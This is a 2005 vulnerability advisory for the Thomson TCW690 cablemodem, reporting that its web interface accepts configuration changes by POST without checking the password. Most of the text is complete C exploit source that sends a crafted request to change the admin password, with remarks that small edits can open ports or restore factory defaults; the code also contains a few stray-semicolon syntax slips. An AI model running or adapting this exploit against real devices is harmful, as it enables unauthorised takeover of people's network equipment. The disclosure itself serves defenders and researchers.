I found a vulnerability in this cablemodem which a malicious user inside *LAN can get the control of the cablemodem easily. This cablemodem model is given by the spanish ISP "AUNA". Details ======= Product: Thomson TCW690 cablemodem Affected Version: ST42.03.0a (not tested in minor versions) Immune Version: ??? Security-Risk: high Exploit: yes Product-URL: http://www.thomson.net/EN/Home/MiniSites/BAP/Cable/ModelDetail.html?category=cab%20modem%20Eurodocsis&model=TCW690 Vendor-URL: http://www.thomson.net/ Vendor-Status: informed but no response Description =========== The http server inside this cablemodem doesn't properly validate the supplied password when an user want to do some change in the configuration and sends a POST request. In the exploit I show how to change the admin password but you can also open ports, deny a user access, restore factory defaults, (all)... with a little changes. Exploit ======= Attached. Fix === No response from vendor. There isn't fix available. Vendor Status ============== 2005.02.06 - Bug found. 2005.02.07 - Informed the vendor broadband@xxxxxxxxxxx, no response. 2005.02.11 - Informed the vendor webmaster@xxxxxxxxxxx no response too. 2005.02.19 - Public disclosure.
/***************************************************************** * Thomson TCW690 POST Password Validation exploit * * Tested with hardware version 2.1 and software version ST42.03.0a * Bug found by: MurDoK <murdok.lnx at gmail.com> * Date: 02.19.2005 * * sh-3.00$ gcc mdk_tcw690.c -o tcw690 * sh-3.00$ ./tcw690 192.168.0.1 123 * ***************************************** * Thomson TCW690 POST Password Validation * Change password exploit coded by MurDoK * ***************************************** * * [1] Connecting... * [2] Sending POST request... * [3] Done! go to http://192.168.0.1 * sh-3.00$ * * fuck AUNA :/ ******************************************************************/ #include <netdb.h> int i=0, x=0, fd; struct sockaddr_in sock; struct hostent *he; char badcode[1000] = "POST /goform/RgSecurity HTTP/1.1\r\n" "Connection: Keep-Alive\r\n" "User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n" "Referer: http://192.168.0.1/RgSecurity.asp\r\n"; "Pragma: no-cache\r\n" "Cache-control: no-cache\r\n" "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n" "Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n" "Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n" "Accept-Language: es, en\r\n" "Host: 192.168.0.1\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Authorization: Basic\r\n" "Content-Length: 62\r\n" "\r\n"; //"Password=hack1&PasswordReEnter=hack1&RestoreFactoryNo=0x00"; int main(int argc, char *argv[]) { // system("clear"); printf("*****************************************\n"); printf(" Thomson TCW690 POST Password Validation\n"); printf(" Change password exploit coded by MurDoK\n"); printf("*****************************************\n\n"); if(argc<3) { printf("Usage: %s <router IP> <new_password>\n\n", argv[0]); exit(1); } fd = socket(AF_INET, SOCK_STREAM, 0); he = gethostbyname(argv[1]); memset((char *) &sock, 0, sizeof(sock)); sock.sin_family = AF_INET; sock.sin_port=htons(80); sock.sin_addr.s_addr=*((unsigned long*)he->h_addr); printf("[1] Connecting... \n"); if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) { printf("ERROR: Can't connect to host!\n"); return 0; } strcat(badcode, "Password="); strcat(badcode, argv[2]); strcat(badcode, "&PasswordReEnter="); strcat(badcode, argv[2]); strcat(badcode, "&RestoreFactoryNo=0x00"); printf("[2] Sending POST request...\n"); write(fd, badcode, strlen(badcode)); printf("[3] Done! go to http://%s\n";, argv[1]); close(fd); return 1; }
